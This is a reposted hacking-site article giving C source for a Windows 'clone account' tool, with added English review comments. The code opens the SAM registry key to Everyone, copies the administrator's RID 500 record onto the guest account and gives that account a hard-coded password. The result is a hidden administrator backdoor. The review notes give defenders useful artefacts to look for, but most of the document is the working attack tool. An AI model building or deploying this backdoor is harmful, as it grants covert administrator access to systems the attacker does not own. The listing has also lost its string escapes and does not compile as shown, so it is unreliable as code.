[推荐]C语言简单实现克隆帐户

C语言简单实现克隆帐户

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2006-8-10 9:33:53
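/* Preprocessor directives as published read "#i nclude" (a space inside the
 * keyword, a common forum anti-filter artefact) and would not compile; they
 * are restored to plain #include here. */
#include <Windows.h>
#include <Aclapi.h>
#include <stdio.h>
#include <stdlib.h>
#include <tchar.h>
#pragma comment (lib,"Advapi32.lib")

/* Buffer sizes used by QueryKey() for subkey names and value names. */
#define MAX_KEY_LENGTH 255
#define MAX_VALUE_NAME 16383

/* Set to 1 by QueryKey() when a Users\Names entry whose default-value type is
 * 0x1F5 has been found; main() treats 0 as "no such account" and exits. */
DWORD user_flag = 0;

/* Name of the account selected for cloning. Written by QueryKey(), read by
 * main() when it builds the "net user" command lines. */
TCHAR cloneUser[1024];

void QueryKey(HKEY hKey);
void banner();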

/* Change the console text attribute for everything printed afterwards.
 * color: a SetConsoleTextAttribute attribute value. Callers in this file use
 * 7, 10, 12 and 14 for status messages and 0 (no visible foreground) around
 * the system("net user ...") calls, presumably to hide net.exe's output.
 * The API's return value is ignored, as in the original. */
void text_color(WORD color)
{
(void)SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), color);
}

/*
 * Entry point. Copies the SAM "F" record of RID 0x1F4 (500) onto RID 0x1F5
 * (501, the account this tool's own error message calls "guest"), then sets
 * a password on that account and disables it with net.exe.
 *
 * argv[1] (optional): password for the cloned account. Without it the
 * hard-coded password "zzrjitop" is used. With two or more arguments neither
 * branch runs and the tool only cleans up.
 *
 * Steps, as written:
 *   1. Read the DACL of MACHINE\SAM\SAM and add an inheritable
 *      Everyone:KEY_ALL_ACCESS ACE.
 *   2. Enumerate SAM\...\Users\Names through QueryKey() to find the account
 *      whose default-value type is 0x1F5.
 *   3. Copy the REG_BINARY value "F" from Users\000001F4 to Users\000001F5.
 *   4. Run "net user <name> <password>" and "net user <name> /active:no".
 *   5. Restore the original DACL at FreeAndExit.
 *
 * Returns 0 from every path that reaches FreeAndExit, failures included;
 * the exit() calls in the middle return 0 or 5 without reaching it.
 *
 * NOTE(review) - observations a defender can take from this listing:
 *   - Every exit() between the DACL change and FreeAndExit (the user_flag
 *     check, each failed net.exe call, and the exits inside QueryKey) leaves
 *     HKLM\SAM\SAM with the Everyone:Full ACE in place. A stray ACE of that
 *     shape is a durable artefact of this tool aborting on a host.
 *   - The password is hard-coded and echoed to the console in clear text.
 *   - The net.exe command lines are built by plain concatenation from a
 *     registry key name and argv[1] with no quoting. That is not a privilege
 *     boundary here (the caller already runs as an administrator), but a
 *     name containing a space or shell metacharacter breaks the command.
 *   - lpDataF is never freed; uKey and cKey are never closed.
 *   - As rendered, the registry path literals use single backslashes and
 *     several messages contain raw line breaks inside string literals; the
 *     published listing has most likely lost its "\\" doubling and "\n"
 *     escapes, so it does not compile as shown.
 */
int main(int argc, char **argv)
{
DWORD dwRet;
// NOTE(review): LPSTR holding a _T() literal only type-checks in a non-UNICODE build.
LPSTR SamName = _T("MACHINE\SAM\SAM");
PSECURITY_DESCRIPTOR pSD = NULL;
PACL pOldDacl = NULL;
PACL pNewDacl = NULL;
EXPLICIT_ACCESS ea;
HKEY hKey = NULL;
LPBYTE lpDataF=NULL;
HKEY cKey, uKey; // 1F5 record (clone target) and Users\Names (enumeration); never closed
DWORD Type=REG_BINARY,SizeF=1024*2; // SizeF: buffer size on input, actual "F" length on output
TCHAR command[1024]; // "net user <name> <password>"
TCHAR command1[1024]; // "net user <name> /active:no"
int ret;

// Allocate and zero the 2 KiB buffer that receives the 1F4 "F" value (never freed)
lpDataF = (LPBYTE) malloc(1024*2);
ZeroMemory(lpDataF,1024*2);

// Author / usage banner
banner();

// Step 1: read the current DACL of the SAM root key. pOldDacl points into
// pSD, which is released at FreeAndExit.
dwRet = GetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, &pOldDacl, NULL, &pSD);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (1) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// Build one ACE: Everyone, KEY_ALL_ACCESS, inherited by every container and
// object below SAM. This is what lets the later RegOpenKeyEx calls ask for
// KEY_ALL_ACCESS on the Users\* keys.
ZeroMemory(&ea, sizeof(EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea, _T("Everyone"), KEY_ALL_ACCESS, SET_ACCESS,
SUB_CONTAINERS_AND_OBJECTS_INHERIT);

// Merge that ACE into a copy of the old DACL (pNewDacl is LocalAlloc'd)
dwRet = SetEntriesInAcl(1, &ea, pOldDacl, &pNewDacl);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (2) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// Write the widened DACL back onto MACHINE\SAM\SAM. This needs WRITE_DAC on
// the key, so the caller is presumably already an administrator; from here
// until FreeAndExit the SAM key tree grants Everyone full control.
dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pNewDacl, NULL);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("Set Privilege (3) Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

_tprintf(_T("[+]Set Privilege.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);

// Step 2: open Users\Names (one subkey per account name) for enumeration
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\Names"),0, KEY_ALL_ACCESS,&uKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// QueryKey() walks the Names subkeys and fills cloneUser / user_flag for the
// first one whose default-value type equals 0x1F5.
QueryKey(uKey);

// No 0x1F5 entry found. NOTE(review): exit() here skips FreeAndExit, so the
// Everyone:Full ACE added above stays on HKLM\SAM\SAM.
if(user_flag == 0){
text_color(12);
_tprintf(_T("The guest user may be delete!"));
text_color(7);
exit(0);
}

// Step 3a: open the account record for RID 0x1F4 (500)
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F4"),
0, KEY_ALL_ACCESS, &hKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// Read 1F4's REG_BINARY "F" value into lpDataF; SizeF now holds its length
dwRet = RegQueryValueEx(hKey, _T("F"), NULL, &Type,lpDataF,&SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// Step 3b: open the record for RID 0x1F5 (501), which the tool assumes is
// the account named in cloneUser
dwRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, _T("SAM\SAM\Domains\Account\Users\000001F5"),
0, KEY_ALL_ACCESS, &cKey);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}

// Step 3c: the clone itself - overwrite 1F5's "F" with 1F4's bytes
dwRet = RegSetValueEx(cKey,_T("F"),0, REG_BINARY,lpDataF,SizeF);
if (dwRet != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegSetValueEx Error: %d"), dwRet);
text_color(12);
_tprintf(_T("[Fail]"));
text_color(7);
goto FreeAndExit;
}
text_color(7);
_tprintf(_T("[+]Clone Successfully.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);
_tprintf(_T("[+]Try to set user password.."));
text_color(10);
_tprintf(_T("[OK]"));
text_color(7);

// Step 4: set a password and disable the account through net.exe.
// Both branches build the command line by plain concatenation (no quoting)
// and hand it to system(); text_color(0) before each call presumably hides
// net.exe's own output. NOTE(review): every exit(5) below skips the DACL
// restore at FreeAndExit.
if(argc == 1)
{


// net user <cloneUser> zzrjitop  (hard-coded password; the narrow literal
// appended with _tcscat is only correct in a non-UNICODE build)
_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, "zzrjitop");
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail.."));
text_color(12);
_tprintf(_T("Fail"));
text_color(7);
exit(5);
}


// net user <cloneUser> /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
// _tprintf(command1);
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..")); // copy-pasted message: this is the /active:no step
text_color(12);
_tprintf(_T("Fail"));
text_color(7);
exit(5);
}
// Credentials are echoed in clear text
text_color(14);
_tprintf(_T("[+]User: %s Password: zzrjitop"), cloneUser);
text_color(7);

}

if(argc ==2)
{

// net user <cloneUser> <argv[1]>  (argv[1] is unvalidated and unquoted)
_tcscpy(command,_T("net user "));
_tcscat(command,cloneUser);
_tcscat(command, _T(" "));
_tcscat(command, argv[1]);
text_color(0);
ret = system(command);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
"));
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
//_tprintf("%s",command);

// net user <cloneUser> /active:no
_tcscpy(command1,_T("net user "));
_tcscat(command1,cloneUser);
_tcscat(command1,_T(" /active:no"));
text_color(0);
ret = system(command1);
if (ret != 0)
{
text_color(7);
_tprintf(_T("Set password fail..
")); // copy-pasted message: this is the /active:no step
text_color(12);
_tprintf(_T("
Fail
"));
text_color(7);
exit(5);
}
// Credentials are echoed in clear text
text_color(14);
_tprintf(_T("[+]
User: %s Password: %s
"), cloneUser, argv[1]);
text_color(7);

}

goto FreeAndExit; // redundant: the label follows immediately

FreeAndExit:
// Cleanup. Only hKey is closed; uKey, cKey and lpDataF are leaked.
if (hKey) RegCloseKey(hKey);
if (pNewDacl) LocalFree(pNewDacl);
// Step 5: put the original DACL back on MACHINE\SAM\SAM. The result lands in
// dwRet but is not checked. This label is reached only through goto - none of
// the exit() calls above get here.
if (pOldDacl) dwRet = SetNamedSecurityInfo(SamName, SE_REGISTRY_KEY, DACL_SECURITY_INFORMATION,
NULL, NULL, pOldDacl, NULL);
if (pSD) LocalFree(pSD);
return 0; // 0 even on the failure paths that jumped here
}

/*
 * Walk the subkeys of hKey (opened on SAM\...\Users\Names by main) and select
 * the first account whose default value has *type* 0x1F5 - the data is read
 * but never looked at. The tool treats that type field as the account's RID
 * (its banner says "Clone the 1F5 user"); that the Names subkeys carry the
 * RID in the value type is the tool's assumption, not something this listing
 * demonstrates - verify on the target build.
 *
 * hKey: open handle to Users\Names.
 * Outputs through globals: cloneUser receives the matching subkey name and
 * user_flag is set to 1. On no match both stay as initialised (main treats
 * user_flag == 0 as "no such account").
 *
 * NOTE(review), all visible below:
 *   - lpData is malloc'd on every iteration and never freed; tKey is never
 *     closed on the success path.
 *   - Size is an in/out parameter of RegQueryValueEx and is never reset, so
 *     from the second iteration on it holds the previous value's length, not
 *     the 2 KiB buffer size.
 *   - RegQueryInfoKey's return code is ignored; cSubKeys is initialised to 0
 *     so the loop simply does not run if it failed.
 *   - The exit(0)/exit(1) calls bypass main's FreeAndExit, leaving the
 *     Everyone:Full ACE main added on HKLM\SAM\SAM in place.
 *   - As rendered, fulPath ends in a lone backslash right before the closing
 *     quote, which in C would escape the quote; the published listing has
 *     lost its "\\" doubling.
 */
void QueryKey(HKEY hKey)
{
TCHAR achKey[MAX_KEY_LENGTH]; // buffer for subkey name
DWORD cbName; // size of name string
TCHAR achClass[MAX_PATH] = TEXT(""); // buffer for class name
DWORD cchClassName = MAX_PATH; // size of class string
DWORD cSubKeys=0; // number of subkeys
DWORD cbMaxSubKey; // longest subkey size
DWORD cchMaxClass; // longest class string
DWORD cValues=0; // number of values for key
DWORD cchMaxValue; // longest value name
DWORD cbMaxValueData; // longest value data
DWORD cbSecurityDescriptor; // size of security descriptor
FILETIME ftLastWriteTime; // last write time
DWORD type = REG_BINARY, Size=1024*2; // type receives the default value's type; Size is in/out (see header note)
LPBYTE lpData=NULL;

DWORD i, retCode;
HKEY tKey;

DWORD cchValue = MAX_VALUE_NAME; // unused

TCHAR fulPath[] =_T("SAM\SAM\Domains\Account\Users\Names\");
TCHAR temp[MAX_VALUE_NAME]; // fulPath + subkey name
ZeroMemory(cloneUser,1024);

// Get the class name and the value count (return code not checked).
retCode = RegQueryInfoKey(
hKey, // key handle
achClass, // buffer for class name
&cchClassName, // size of class string
NULL, // reserved
&cSubKeys, // number of subkeys
&cbMaxSubKey, // longest subkey size
&cchMaxClass, // longest class string
&cValues, // number of values for this key
&cchMaxValue, // longest value name
&cbMaxValueData, // longest value data
&cbSecurityDescriptor, // security descriptor
&ftLastWriteTime); // last write time



// Enumerate the subkeys, until RegEnumKeyEx fails.

if (cSubKeys)
{
//printf( "
Number of subkeys: %d
", cSubKeys);

for (i=0; i<cSubKeys; i++)
{
cbName = MAX_KEY_LENGTH;
retCode = RegEnumKeyEx(hKey, i,
achKey,
&cbName,
NULL,
NULL,
NULL,
&ftLastWriteTime);
if (retCode == ERROR_SUCCESS)
{
//_tprintf(TEXT("(%d) %s
"), i+1, achKey);
// Build the full path of this account's Names subkey
ZeroMemory(temp,sizeof(temp));
_tcscpy(temp, fulPath);
_tcscat(temp,achKey);
//_tprintf(_T("%s
"), temp);

// Open it with full access (relies on the DACL main widened); a failure aborts the process
retCode = RegOpenKeyEx(HKEY_LOCAL_MACHINE, temp, 0, KEY_ALL_ACCESS,&tKey);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegOpenKeyEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
exit(0);
}

// Fresh 2 KiB buffer per iteration; never freed
lpData = (LPBYTE)malloc(2*1024);
ZeroMemory(lpData,2*1024);

// Query the key's default value (NULL name); only its type is used afterwards
retCode = RegQueryValueEx(tKey, NULL, NULL, &type, lpData,&Size);
if (retCode != ERROR_SUCCESS)
{
text_color(7);
_tprintf(_T("RegQueryValueEx Error: %d"), retCode);
text_color(12);
_tprintf(_T("[Fail]
"));
text_color(7);
if(tKey) RegCloseKey(tKey);
exit(1);
}

// Match on the value *type* being 0x1F5 (RID 501 in the tool's reading)
if(type==0x1f5) {
text_color(7);
_tprintf(_T("[+]Starting clone %s.."), achKey);
text_color(10);
_tprintf(_T("[OK]
"));
text_color(7);
// achKey is at most MAX_KEY_LENGTH TCHARs, well inside cloneUser's 1024
_tcscpy(cloneUser,achKey);
user_flag = 1;
break; // tKey is left open here
}

}
}
}

// Enumerate the key values.
}

/* Print the tool's banner: a framed header naming the project URL, what the
 * tool clones ("the 1F5 user") and the two accepted command lines
 * ("clone.exe" or "clone.exe pass"). The credit line is printed with colour
 * attribute 12 and the attribute is reset to 7 afterwards. Output is
 * identical to the original, including the raw line break inside the second
 * string as the listing is rendered. */
void banner(){
static const TCHAR *const frame_lines[] = {
_T("******************************************************"),
_T("* Clone account Tool
http://www.eviloctal.com"),
_T("* Clone the 1F5 user"),
_T("* Usage: clone.exe or clone.exe pass"),
_T("*")
};
size_t idx;

// Header rows: printed through an explicit "%s" format rather than as format strings
for (idx = 0; idx < sizeof(frame_lines) / sizeof(frame_lines[0]); idx++)
_tprintf(_T("%s"), frame_lines[idx]);

// Credit line in colour 12, then back to the default attribute
text_color(12);
_tprintf(_T("%s"), _T(" If clone successfully it was made by zz[E.S.t]"));
text_color(7);
_tprintf(_T("%s"), _T("******************************************************"));
}